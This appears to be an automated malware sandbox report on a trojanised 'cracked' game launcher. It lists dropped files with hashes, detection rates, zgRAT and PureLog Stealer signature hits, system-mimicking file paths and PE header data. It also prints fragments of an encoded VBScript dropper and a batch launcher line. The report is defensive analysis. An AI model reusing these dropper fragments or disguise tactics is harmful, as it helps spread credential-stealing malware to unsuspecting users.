                                                          SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                          SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 71%
                                                          • Antivirus: Virustotal, Detection: 69%
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):69632
                                                          Entropy (8bit):5.932541123129161
                                                          Encrypted:false
                                                          SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                          MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                          SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                          SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                          SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 17%
                                                          • Antivirus: Virustotal, Detection: 41%
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):85504
                                                          Entropy (8bit):5.8769270258874755
                                                          Encrypted:false
                                                          SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                          MD5:E9CE850DB4350471A62CC24ACB83E859
                                                          SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                          SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                          SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 71%
                                                          • Antivirus: Virustotal, Detection: 69%
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):32256
                                                          Entropy (8bit):5.631194486392901
                                                          Encrypted:false
                                                          SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                          MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                          SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                          SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                          SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 29%
                                                          • Antivirus: Virustotal, Detection: 29%
                                                          Process:C:\blockhostnet\msinto.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):1916416
                                                          Entropy (8bit):7.538719704947355
                                                          Encrypted:false
                                                          SSDEEP:24576:PulZDtxsIdGCPzmHkuMk4f4RxoKxLi6TpR2Jcjdsq2Qnkvu0IaVthZbJ8ytHuc8m:GPtx5dxKo+LbxqqfnWucVpbJ8y1G
                                                          MD5:83152560524B250C6C27561117DF37FE
                                                          SHA1:F17613B0D3EC3D46A51DAF0CA011FF7DC8A8D53A
                                                          SHA-256:72BCBCB256F87968AD40AEF6B4DAC464921CE8F66CDC242B65EB6E9F23B3CA80
                                                          SHA-512:7793EB5DCC26A00A0C72A07DD084A99D2B41E87E995A25040DD183BD84E94FCE652EB896F0EAFAA717BD97A67B8D1BB8E7A28B4C7EA4F39C15532881304A218C
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\Globalization\Time Zone\backgroundTaskHost.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\Globalization\Time Zone\backgroundTaskHost.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 75%
                                                          • Antivirus: Virustotal, Detection: 56%
                                                          Process:C:\blockhostnet\msinto.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):24
                                                          Entropy (8bit):4.136842188131012
                                                          Encrypted:false
                                                          SSDEEP:3:EHWWjTGyk:MvTG3
                                                          MD5:7D61F850DDE05E2E037047A2A83018D2
                                                          SHA1:488213ECA23730A85742A7B4F56F4F6B22CE12AB
                                                          SHA-256:C7849F506D6EAF4A926AECF14373E309912EA2D74F13ADE566321678C6CDE347
                                                          SHA-512:50EB05F15DCFA14B74D75842108771A74FD9E271E5172A61812A4D6420FDCA90435480C2F4F2B79A8D2AA92EC443DCC07E64C3204552C387AACB8D0B7ADDC9EF
                                                          Malicious:false
                                                          Preview:czCincu5t6YFUW3IRrt06cWA
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:MSVC .res
                                                          Category:dropped
                                                          Size (bytes):1224
                                                          Entropy (8bit):4.435108676655666
                                                          Encrypted:false
                                                          SSDEEP:24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
                                                          MD5:931E1E72E561761F8A74F57989D1EA0A
                                                          SHA1:B66268B9D02EC855EB91A5018C43049B4458AB16
                                                          SHA-256:093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
                                                          SHA-512:1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
                                                          Malicious:false
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):4608
                                                          Entropy (8bit):3.963061730637048
                                                          Encrypted:false
                                                          SSDEEP:48:6RJbPtPaM7Jt8Bs3FJsdcV4MKe27CFxPsvqBH+OulajfqXSfbNtm:EPpHPc+Vx9MCrUvkYcjRzNt
                                                          MD5:4788148707AB5BF3822FC2EF781B81D5
                                                          SHA1:0463F866A84DC4DF855EFD18FE3B5EB0CFA02214
                                                          SHA-256:AE09D3D7E50AC634E247FD61981EF7756C8BB217517046168929D20A5FBAEF2B
                                                          SHA-512:5FF98CBF7E431DC32726CB789134B5657165C97676627DCDF9F3E351E31E772FD038B0746AF38E7A832684E588B3DFF243B0C7338F95A7E1C794A2C9BA2F5D6E
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Process:C:\blockhostnet\msinto.exe
                                                          File Type:ASCII text, with very long lines (560), with no line terminators
                                                          Category:dropped
                                                          Size (bytes):560
                                                          Entropy (8bit):5.862116915795869
                                                          Encrypted:false
                                                          SSDEEP:12:Qu9Ua2/BXCTKwaElmC7Mvd4T/pZzJyUSy6uEqI0hbIn:4a2NAuC7MuT/Lwy6uEd0Gn
                                                          MD5:D921DDCE81871202BABF01AC874E8F6A
                                                          SHA1:DA175FF51427BCA8AB2AE3B7D7A3A1E2D80DB00E
                                                          SHA-256:F08E905615074F730EC3225E1D289D97D7D0C24483009C365C0FD69B200ACA90
                                                          SHA-512:B062CE45B01A11E7D6F34AB1FAED3982F7730C8034562556AC81B68092C984ED3B9C76C778329D4BF8828118E71DDF2C7971752F2BF4C6E4D0747522D2904EE1
                                                          Malicious:false
                                                          Preview:QHawVg1741z6s1etcEIHoi3W29UzG1Jec6v7TPVpHZ7IMv8oMT7z833rOE4VLB0CsVewFgaMsc9PlvJHBqnx4UfjCDtPVAdFj4Z1QMip3vGg3oFd5xUfYCIX05tBwK0s94prVS0zH84IN8pY7QUiq8rgvBBVch2s4Yg88YHm6eXZI9K1PUDg0SCBMJ5TQeWkFMOzcqajIrlLkRYw1KGIdW1mWfwydyWcIxU5vUZi4eYJq0a5uJbGYOGsUld64lGTUJDw7cAgvhN97s5fF1ETWPD3qllJ1cnSXEyhxo8SJ5V0AHulq81Dhw7FFJFV10pS45l34Yra3vKb4N3j09d2lkvkHtboimaSPC6Fg1qRRaKvmfK1Qge1WwqTJAwL6D1QV1L1RxC9TLlLaA8likYCIj5cWm5gEeVOi3auUSkcdfiKLf3JBLnWoyIw6tfp1g4y0XmgjOQP95jmAuR0swe318jtuoykx4k6ltUx3Wjx4XWtPfvLbo7FCA61y2v5ZqcFVnBQae7VNq8em0eO2nJI7f3kxc8AlnXO4RXmeeu7rl1VBcP8
                                                          Process:C:\blockhostnet\msinto.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):1916416
                                                          Entropy (8bit):7.538719704947355
                                                          Encrypted:false
                                                          SSDEEP:24576:PulZDtxsIdGCPzmHkuMk4f4RxoKxLi6TpR2Jcjdsq2Qnkvu0IaVthZbJ8ytHuc8m:GPtx5dxKo+LbxqqfnWucVpbJ8y1G
                                                          MD5:83152560524B250C6C27561117DF37FE
                                                          SHA1:F17613B0D3EC3D46A51DAF0CA011FF7DC8A8D53A
                                                          SHA-256:72BCBCB256F87968AD40AEF6B4DAC464921CE8F66CDC242B65EB6E9F23B3CA80
                                                          SHA-512:7793EB5DCC26A00A0C72A07DD084A99D2B41E87E995A25040DD183BD84E94FCE652EB896F0EAFAA717BD97A67B8D1BB8E7A28B4C7EA4F39C15532881304A218C
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 75%
                                                          • Antivirus: Virustotal, Detection: 56%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.................6..........>T... ...`....@.. ....................................@..................................S..K....`.. ............................................................................ ............... ..H............text...D4... ...6.................. ..`.rsrc... ....`.......8..............@....reloc...............<..............@..B................ T......H...........................x..mS.......................................0..........(.... ........8........E....).......9...*...8$...(.... ....~....{....:....& ....8....*(.... ....8....(.... ....~....{....9....& ....8........0.......... ........8........E........6......._.......8....r...ps....z*...... ....~....{....:....& ....8....~....:.... ....~....{....9....& ....8........~....(P...~....(T... ....?.... ........8T...~....(H... .... .... ....s....~....(L....... ........8....
                                                          Process:C:\blockhostnet\msinto.exe
                                                          File Type:ASCII text, with very long lines (900), with no line terminators
                                                          Category:dropped
                                                          Size (bytes):900
                                                          Entropy (8bit):5.913799658997805
                                                          Encrypted:false
                                                          SSDEEP:24:aYyuUBoSCmQVygTFuxyWz44ryrp7XgNR1by:aYWBoSCmZgTFux7z44xNRVy
                                                          MD5:8095DEA4A93DB89BD3EFF4E24CEF3508
                                                          SHA1:C8898B4B2DDFEC512213F2B8244DED313AC14D30
                                                          SHA-256:59C50C736DFEB41B24A86D6CABDED95FBB866195FC30EA0526B3CF2C6367275E
                                                          SHA-512:3E5D3F24E0D2961F318291E97F01378BE0531A7DDEF3FF644F9F40E8F3F5BF4FEEBDFCC19B37AF61D2300F2A829F884EDF8349E9F205102772C23FB7510B92A1
                                                          Malicious:false
                                                          Preview:
                                                          Process:C:\blockhostnet\msinto.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):1916416
                                                          Entropy (8bit):7.538719704947355
                                                          Encrypted:false
                                                          SSDEEP:24576:PulZDtxsIdGCPzmHkuMk4f4RxoKxLi6TpR2Jcjdsq2Qnkvu0IaVthZbJ8ytHuc8m:GPtx5dxKo+LbxqqfnWucVpbJ8y1G
                                                          MD5:83152560524B250C6C27561117DF37FE
                                                          SHA1:F17613B0D3EC3D46A51DAF0CA011FF7DC8A8D53A
                                                          SHA-256:72BCBCB256F87968AD40AEF6B4DAC464921CE8F66CDC242B65EB6E9F23B3CA80
                                                          SHA-512:7793EB5DCC26A00A0C72A07DD084A99D2B41E87E995A25040DD183BD84E94FCE652EB896F0EAFAA717BD97A67B8D1BB8E7A28B4C7EA4F39C15532881304A218C
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\debug\explorer.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\debug\explorer.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 75%
                                                          • Antivirus: Virustotal, Detection: 56%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.................6..........>T... ...`....@.. ....................................@..................................S..K....`.. ............................................................................ ............... ..H............text...D4... ...6.................. ..`.rsrc... ....`.......8..............@....reloc...............<..............@..B................ T......H...........................x..mS.......................................0..........(.... ........8........E....).......9...*...8$...(.... ....~....{....:....& ....8....*(.... ....8....(.... ....~....{....9....& ....8........0.......... ........8........E........6......._.......8....r...ps....z*...... ....~....{....:....& ....8....~....:.... ....~....{....9....& ....8........~....(P...~....(T... ....?.... ........8T...~....(H... .... .... ....s....~....(L....... ........8....
                                                          Process:C:\blockhostnet\msinto.exe
                                                          File Type:ASCII text, with very long lines (823), with no line terminators
                                                          Category:dropped
                                                          Size (bytes):823
                                                          Entropy (8bit):5.89179187661525
                                                          Encrypted:false
                                                          SSDEEP:24:fiEs5jJseTeQOymqagWtw9xRdLFp8j5xwb3+xKlUQA63A/O:/sRJnCQFJaT82j503Hw/O
                                                          MD5:1D052ED5F89C08B906A2D9E573E58855
                                                          SHA1:61C9AB5FDC17825F42AAF6E32D8434744890ED82
                                                          SHA-256:10E234C5DA43522314BC80A75BBAD2F6329634E42EBA679CFB63A0C4B08EF8BD
                                                          SHA-512:F18EA686217B2AADAF9DD4808D151E4897054DF18E099CACFE0042ADB2D8084F5C1A721AAEA2324594E1BA142E5A62A5DEDEE58ECFFBC6273C9B0BB610B2C8E0
                                                          Malicious:false
                                                          Preview:
                                                          Process:C:\Users\user\AppData\Local\Temp\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):196
                                                          Entropy (8bit):5.646965679258475
                                                          Encrypted:false
                                                          SSDEEP:6:GivwqK+NkLzWbHnrFnBaORbM5nCeHt2lSG+HhYWs:Gi2MCzWLnhBaORbQCmdGAhu
                                                          MD5:8F9AFB736D7DCAF92555A19215FA5C7B
                                                          SHA1:F735F020E772AC67B5ED87C15D110973980E271B
                                                          SHA-256:D78691F9757EA266450F639553638BDB3F7383341298578A2F4096A7096B2FB4
                                                          SHA-512:69D27657031B6B8C8C9D266F8498A824A13434D62D80144CB5966E26B4E2B2E2E43247AF31DC5D845B1A771E267E71BA59DCBCB04F532BCE8892A462C035D10B
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          Preview:#@~^qwAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2v f!ZT*@#@&U+DP.ktU4+^V~',Z.nmY+}8L.mYvE.?1DbwORj4.VsJ*@#@&q/4j4+Vs "EUPr/=z8^W13tK/DU+Dz&ko?phc4lDE~,!~,WCVk+5DUAAA==^#~@.
                                                          Process:C:\Users\user\AppData\Local\Temp\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):71
                                                          Entropy (8bit):5.09863176058791
                                                          Encrypted:false
                                                          SSDEEP:3:jRWo0o/smhEIaKRQAB8HBA:tWoImV8hA
                                                          MD5:5B64FE1545FBF11EC2BF13E3CF7579DB
                                                          SHA1:BC17A73A181CA2E2DD489173E12861416E6DB274
                                                          SHA-256:579E774B18B84F5D6CBA055A2ED46893B438EE98317EFAFA9837C6E796F6496F
                                                          SHA-512:8E44C179350D5554299C303D54B30C934EFF8ED69F807BB810D93087085909D8306EB0F3A7476FC6707C4565C0958E720B8086E5C038E2F337B79F310203C153
                                                          Malicious:false
                                                          Preview:%WqjLGd%%nsMZ%..%zQnhRHlLwRcpBxb%"C:\blockhostnet/msinto.exe"%JYnVfyiJ%
                                                          Process:C:\Users\user\AppData\Local\Temp\svchost.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):1916416
                                                          Entropy (8bit):7.538719704947355
                                                          Encrypted:false
                                                          SSDEEP:24576:PulZDtxsIdGCPzmHkuMk4f4RxoKxLi6TpR2Jcjdsq2Qnkvu0IaVthZbJ8ytHuc8m:GPtx5dxKo+LbxqqfnWucVpbJ8y1G
                                                          MD5:83152560524B250C6C27561117DF37FE
                                                          SHA1:F17613B0D3EC3D46A51DAF0CA011FF7DC8A8D53A
                                                          SHA-256:72BCBCB256F87968AD40AEF6B4DAC464921CE8F66CDC242B65EB6E9F23B3CA80
                                                          SHA-512:7793EB5DCC26A00A0C72A07DD084A99D2B41E87E995A25040DD183BD84E94FCE652EB896F0EAFAA717BD97A67B8D1BB8E7A28B4C7EA4F39C15532881304A218C
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\blockhostnet\msinto.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\blockhostnet\msinto.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 75%
                                                          • Antivirus: Virustotal, Detection: 56%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.................6..........>T... ...`....@.. ....................................@..................................S..K....`.. ............................................................................ ............... ..H............text...D4... ...6.................. ..`.rsrc... ....`.......8..............@....reloc...............<..............@..B................ T......H...........................x..mS.......................................0..........(.... ........8........E....).......9...*...8$...(.... ....~....{....:....& ....8....*(.... ....8....(.... ....~....{....9....& ....8........0.......... ........8........E........6......._.......8....r...ps....z*...... ....~....{....:....& ....8....~....:.... ....~....{....9....& ....8........~....(P...~....(T... ....?.... ........8T...~....(H... .... .... ....s....~....(L....... ........8....
                                                          Process:C:\Users\user\AppData\Local\Temp\explorer.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):167
                                                          Entropy (8bit):4.737818991476617
                                                          Encrypted:false
                                                          SSDEEP:3:cWsqFrLWVYTqv42OVsAHercfRUovg/GJMALkFVJLCAjMLEJ3rbF:cx+rozOVsLIfRUooOCALK2RLCF
                                                          MD5:6DD26DB185D90DB1D8D8A8A4A708FFCE
                                                          SHA1:5C6233CB2FE5593455FC524BD7673995BE138C37
                                                          SHA-256:01BD8B04B2AC0DF9770C2D75DC9CD3B134F21DE1819B99F1CEB4661B26608E30
                                                          SHA-512:347EBA836A1C746AC9092AA8801342437EC73C55F72B0A780C9E6611B534A46052F54E998C33B763F225456133E821765A8BB710B6A999988DBAEAC6C949B5B8
                                                          Malicious:false
                                                          Preview: .... Nursultan NextGen 1.16.5 -> Launcher.. Cracked by Sk3d Club.... [?] Current memory: 2048.... 1 > Start client... 2 > Change memory..... [?] Select a option:
                                                          Process:C:\Windows\System32\w32tm.exe
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):151
                                                          Entropy (8bit):4.789320938113328
                                                          Encrypted:false
                                                          SSDEEP:3:VLV993J+miJWEoJ8FXgSzIsXuaNvpGE4qNvj:Vx993DEULSJic
                                                          MD5:7F07E96926A0F7EFEE496D2D88643FBB
                                                          SHA1:DEE048946585B578334B0FEB855EE4D359A7CA8A
                                                          SHA-256:F8954AFA8CBE9C9F10486F9FC161774B1BB030A7DD2AB0C27F2E51F4CD431508
                                                          SHA-512:E5DFA2356E89CB00223270AC9923873FE8117015CA8269139D463AF163E4C29C0600B4ED0DAF5672253B36D12149CFDE9DEECE54EE5196B4604C282D6FBEDDD1
                                                          Malicious:false
                                                          Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 01/10/2024 01:21:34..01:21:34, error: 0x80072746.01:21:39, error: 0x80072746.
                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Entropy (8bit):7.829184127922152
                                                          TrID:
                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.69%
                                                          • Win32 Executable (generic) a (10002005/4) 49.64%
                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                          • InstallShield setup (43055/19) 0.21%
                                                          • Windows Screen Saver (13104/52) 0.07%
                                                          File name:Zn0uX5K1ez.exe
                                                          File size:8'034'816 bytes
                                                          MD5:58509394a423edb98b0b1be7f18551ab
                                                          SHA1:4b7a8ff6ec8bd5908e306cb23d2b84ce3ff03ec3
                                                          SHA256:78fee239cf44c2ab923669b8ccf016ef117a9682e339d96de87fa2f0a45200cc
                                                          SHA512:41ec27bb184d55d84b3e7150df35d2229cf93ae389fc4f8b9f8bded29fb730661ddc3a21d6d926f6d98cc169e851e44928fb2058bd898d96924f69e301350b9a
                                                          SSDEEP:196608:GPtx5dUAuaAxSTZLvD6/x1R92cJUMo7xS6:ctx5dUARAh5n9/GMolS6
                                                          TLSH:1F86125972802F35C12545318523A93DA2F1E72A2665EE5F32CBB8C17B177E0CE52FA3
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f..................y...........y.. ....z...@.. ....................... {...........`................................
                                                          Icon Hash:66e2a0a0b0aa92b6
                                                          Entrypoint:0xb9e29e
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x66DB139A [Fri Sep 6 14:37:14 2024 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:4
                                                          OS Version Minor:0
                                                          File Version Major:4
                                                          File Version Minor:0
                                                          Subsystem Version Major:4
                                                          Subsystem Version Minor:0
                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                          Instruction
                                                          jmp dword ptr [00402000h]
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x79e24c | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x7a2000 | 0xcc88 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x7b0000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x7a0000 | 0x1c | .sdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x79c2a4 | 0x79c400 | d47994deab5dc0b92621ae3ce91f554d | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.sdata | 0x7a0000 | 0x138 | 0x200 | bdab1a454ea0810fa08c0ac0b823eb2d | False | 0.197265625 | data | 1.4992511081653355 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x7a2000 | 0xcc88 | 0xce00 | 56dd3ea7815d8d87144bcdd5c7a1b3a2 | False | 0.17963061286407767 | data | 4.314508822158264 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x7b0000 | 0xc | 0x200 | 5a589ea89ca64d5cf88700bb44d5eac5 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x7a24c8 | 0xeeb | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.8866195339094004
RT_ICON | 0x7a33b8 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 0 | | | 0.061230514879546526
RT_ICON | 0x7a75e0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | | | 0.09139004149377593
RT_ICON | 0x7a9b88 | 0x1a68 | Device independent bitmap graphic, 40 x 80 x 32, image size 0 | | | 0.11553254437869823
RT_ICON | 0x7ab5f0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | | | 0.1376641651031895
